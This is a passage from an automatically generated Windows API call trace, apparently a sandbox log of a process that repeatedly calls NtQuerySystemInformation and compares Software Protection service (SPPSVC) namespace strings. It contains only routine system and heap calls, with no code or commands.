ResultLength=0x0) [0220.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x28, ResultLength=0x0) [0220.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0220.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.098] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0220.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd520, Length=0x20, ResultLength=0x0) [0220.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0220.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.099] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4a0, Length=0x20, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0220.100] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd590, Length=0x20, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.101] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0220.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x20, ResultLength=0x0) [0220.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0220.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.102] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x20, ResultLength=0x0) [0220.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.103] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb08, Length=0x50, ResultLength=0x0) [0220.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.104] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0220.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0220.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0220.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.106] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0220.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0220.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8d0, Length=0x28, ResultLength=0x0) [0220.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0220.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.107] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0220.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.110] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x28, ResultLength=0x0) [0220.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0220.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0220.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd830, Length=0x20, ResultLength=0x0) [0220.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd830, Length=0x20, ResultLength=0x0) [0220.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.111] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd830, Length=0x20, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda30, Length=0x38, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8b0, Length=0x20, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0220.112] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.113] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x50, ResultLength=0x0) [0220.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.114] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x38, ResultLength=0x0) [0220.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd710, Length=0x28, ResultLength=0x0) [0220.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd710, Length=0x28, ResultLength=0x0) [0220.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd710, Length=0x28, ResultLength=0x0) [0220.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.117] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd710, Length=0x28, ResultLength=0x0) [0220.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x28, ResultLength=0x0) [0220.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x38, ResultLength=0x0) [0220.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.118] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x28, ResultLength=0x0) [0220.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd800, Length=0x28, ResultLength=0x0) [0220.121] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x38, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x20, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x20, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x20, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x20, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.122] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x38, ResultLength=0x0) [0220.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x20, ResultLength=0x0) [0220.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0220.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.123] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x20, ResultLength=0x0) [0220.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.125] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.126] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0220.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd998, Length=0x50, ResultLength=0x0) [0220.126] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.127] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0220.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0220.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.129] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0220.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6f0, Length=0x28, ResultLength=0x0) [0220.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.130] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd760, Length=0x28, ResultLength=0x0) [0220.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0220.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.131] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7e0, Length=0x28, ResultLength=0x0) [0220.133] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7e0, Length=0x28, ResultLength=0x0) [0220.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0220.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd740, Length=0x20, ResultLength=0x0) [0220.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x20, ResultLength=0x0) [0220.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x20, ResultLength=0x0) [0220.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6c0, Length=0x20, ResultLength=0x0) [0220.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.135] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x38, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd740, Length=0x20, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x20, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.457] GetProcessHeap () returned 0x27fc8db0000 [0220.458] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f86900 [0220.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.489] GetProcessHeap () returned 0x27fc8db0000 [0220.489] RtlAllocateHeap (HeapHandle=0x27fc8db0000, Flags=0x0, Size=0x28) returned 0x27fc9f86ba0 [0220.489] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe880, Length=0x28, ResultLength=0x0) [0220.490] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0220.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.490] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, Length=0x50, ResultLength=0x0) [0220.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0220.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe900, 